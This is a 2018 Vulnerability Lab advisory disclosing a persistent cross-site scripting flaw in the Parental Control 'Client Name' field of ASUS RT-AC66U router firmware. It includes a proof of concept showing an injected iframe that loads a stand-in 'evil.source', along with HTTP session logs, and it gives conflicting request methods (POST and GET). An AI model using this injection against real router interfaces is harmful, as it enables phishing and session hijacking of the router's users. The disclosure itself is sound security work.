Document Title: =============== ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=1993 Release Date: ============= 2018-06-27 Vulnerability Laboratory ID (VL-ID): ==================================== 1993 Common Vulnerability Scoring System: ==================================== 3 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== 802.11ac Dual-Band Wireless-AC1750 Gigabit Router. RT-AC66U supports several operation modes to meet different requirements. Please select the mode that match your situation. Wireless router mode (Default), Access Point(AP) mode or Media bridge. In wireless router/ IP sharing mode, RT-AC66U connects to the Internet via PPPoE, DHCP, PPTP, L2TP, or Static IP and shares the wireless network to LAN clients or devices. In this mode, NAT, firewall, and DHCP server are enabled by default. UPnP and Dynamic DNS are supported for SOHO and home users. Select this mode if you are a first-time user or you are not currently using any wired/wireless routers. The ASUS RT-AC66U is a 5th gen dual-band Wi-Fi router, and the launch platform for the new ASUS AiCloud service. Its speed reaches 1.75Gbps, utilizing the Broadcom 802.11ac Wi-Fi controller and working in 2.4GHz and 5GHz. The 5GHz band supports up to 1.3Gbps, exceeding current Gigabit wired transmission and 3X faster than 802.11n. The RT-AC66U offers smooth lag-resistant multitasking and super-fast streaming, while ASUS AiRadar intelligently strengthens wireless connections via powerful amplification, offering future-proof optimized performance. (Copy of the Homepage: https://www.asus.com/Networking/RTAC66U/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered mutliple cross site scripting vulnerabilities in the official ASUS Wireless Router RT Firmware v3.0.0.4.372_67. Vulnerability Disclosure Timeline: ================================== 2018-06-27: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== ASUS Product: WRT - Wireless Router (UI) 3.0.0.4.372_67 Exploitation Technique: ======================= Local Severity Level: =============== Medium Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A cross site scripting vulnerability has been discovered in the ASUS Wireless Router RT Firmware v3.0.0.4.372_67. The cross site scripting web vulnerability allows remote attackers to inject own malicious script codes on the application-side of the vulnerable function or service module. The cross site scripting vulnerability is located in the `Client Name` input field of the `Partental Control` modules. The input field for the client name is not secure parsed. Thus allows an attacker to manipulate the client list on index of the module. The request method to inject is POST and the attack vector is located on the application-side. Due to no reachable cookies in the panel ui, low privileged user accounts are only able to redirect or inject malware to the client-side for an execute. First the context is saved client-side and after using apply function the context is saved permanently to the image db. The security risk of the client-side cross site scripting web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0. Exploitation of the client-side web vulnerability requires a privileged web-application user account and low user interaction. Successful exploitation of the vulnerability results in non-persistent phishing, session hijacking, non-persistent external redirect to malicious sources and client-side manipulation of affected or connected web module context. Request Method(s): [+] GET Vulnerable Module(s): [+] Parental Control Vulnerable Parameter(s): [+] Client Name Proof of Concept (PoC): ======================= The cross site vulnerability can be exploited by remote attackers with privileged user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Exploitation <tbody><tr><th title="Select all" width="5%" height="30px"><input id="selAll" onclick="selectAll(this, 0);" value="" type="checkbox"></th><th width="40%">Clients Name</th><th width="25%">Clients MAC Address</th><th width="10%"> Time Management</th><th width="10%">Add / Delete</th></tr><tr><td style="border-bottom:2px solid #000;" title="Enable/Disable"><input id="newrule_Enable" checked="" type="checkbox"></td><td style="border-bottom:2px solid #000;"> <input maxlength="32" style="margin-left:10px;float:left;width:255px;" class="input_20_table" name="PC_devicename" onkeypress="" onclick="hideClients_Block();" onblur="if(!over_var){hideClients_Block();}" type="text"><img id="pull_arrow" src="images/arrow-down.gif" onclick="pullLANIPList(this);" title="Select the device name of DHCP clients." onmouseover="over_var=1;" onmouseout="over_var=0;" height="14px;"><div id="ClientList_Block_PC" class="ClientList_Block_PC"> <a><div onmouseover="over_var=1;" onmouseout="over_var=0;" onclick="setClientIP('JIEMING-NB', '50:E5:49:A2:00:F8');"> <strong>192.168.1.166</strong> ( JIEMING-NB) </div></a><a><div onmouseover="over_var=1;" onmouseout="over_var=0;" onclick="setClientIP('JIEMING-MACBOOK', '98:4B:E1:CB:DA:D6');"><strong>192.168.1.188</strong> ( JIEMING-MACBOOK) </div></a> <a><div onmouseover="over_var=1;" onmouseout="over_var=0;" onclick="setClientIP('JIEMING-PC', 'A8:26:D9:31:2B:49');"> <strong>192.168.1.161</strong> ( JIEMING-PC) </div></a><a><div onmouseover="over_var=1;" onmouseout="over_var=0;" onclick="setClientIP('A8:26:D9:31:2B:49', 'A8:26:D9:31:2B:49');"><strong>192.168.1.210</strong> </div></a> <!--[if lte IE 6.5]><iframe class="hackiframe2"></iframe><![endif]--></div></td><td style="border-bottom:2px solid #000;"> <input maxlength="17" class="input_macaddr_table" name="PC_mac" onkeypress="return is_hwaddr(this,event)" type="text"></td><td style="border-bottom:2px solid #000;">--</td><td style="border-bottom:2px solid #000;"> <input class="url_btn" onclick="addRow_main(16)" value="" type="button"></td></tr><tr id="row0"><td title="1"> <input onclick="genEnableArray_main(0,this);" checked="" type="checkbox"></td><td title=""></td> <td title="aa:aa:aa:aa:aa:aa">aa:aa:aa:aa:aa:aa</td><td><input class="service_btn" onclick="gen_lantowanTable(0);" value="" type="button"></td><td><input class="remove_btn" onclick="deleteRow_main(this);" value="" type="button"></td></tr> <tr id="row1"><td title="undefined"><input onclick="genEnableArray_main(1,this);" type="checkbox"></td> <td title="" <iframe="" src="evil.source"">"<iframe src="evil.source</td"><td title="undefined">undefined</td> <td><input class="service_btn" type="button" onclick="gen_lantowanTable(1);" value=""/></td><td><input class="remove_btn" type="button" onclick="deleteRow_main(this);" value=""/></td><tr id="row2"><td title="undefined"> <input type="checkbox" onclick="genEnableArray_main(2,this);" /></td><td title=""></td><td title="undefined">undefined</td> <td><input class="service_btn" type="button" onclick="gen_lantowanTable(2);" value=""/></td><td> <input class="remove_btn" type="button" onclick="deleteRow_main(this);" value=""/> </td></tr></table></iframe></td></tr></tbody> --- PoC Session Logs [GET] --- Status: 304[Not Modified] GET http://event.localhost/nw/_ui/en/ParentalControl.html Mime Type[text/html] Request Header: Host[event.localhost] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[http://event.localhost/nw/_ui/en/Advanced_System_Content.html] Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0] Connection[keep-alive] Upgrade-Insecure-Requests[1] If-Modified-Since[Thu, 20 Jun 2013 05:45:19 GMT] If-None-Match["31793159796dce1:0"] Cache-Control[max-age=0] Response Header: Content-Type[text/html] Last-Modified[Thu, 20 Jun 2013 05:45:19 GMT] Etag["31793159796dce1:0"] Connection[keep-alive] - Status: 200[OK] GET http://event.localhost/nw/_ui/en/evil.source%3C/td Mime Type[text/html] Request Header: Host[event.localhost] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[http://event.localhost/nw/_ui/en/ParentalControl.html] Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Content-Type[text/html] Server[Microsoft-IIS/7.5] X-Powered-By[ASP.NET] Content-Length[1245] Connection[keep-alive] Reference(s): http://event.localhost/ http://event.localhost/nw/ http://event.localhost/nw/_ui/ Solution - Fix & Patch: ======================= The issue has been reported in 2016 Q4 (2016-11-09) and was finally resolved in 2017 Q3 - Q4 by the asus wrt developer team. The public disclosure process took about 10 month. Security Risk: ============== The security risk of the persistent cross site scripting web vulnerability in the asus wrt ui is estimated as medium (CVSS 3.0). Credits & Authors: ================== Lawrence Amer (Vulnerability Lab Core Research Team) [zeroattck@xxxxxxxxx] - https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com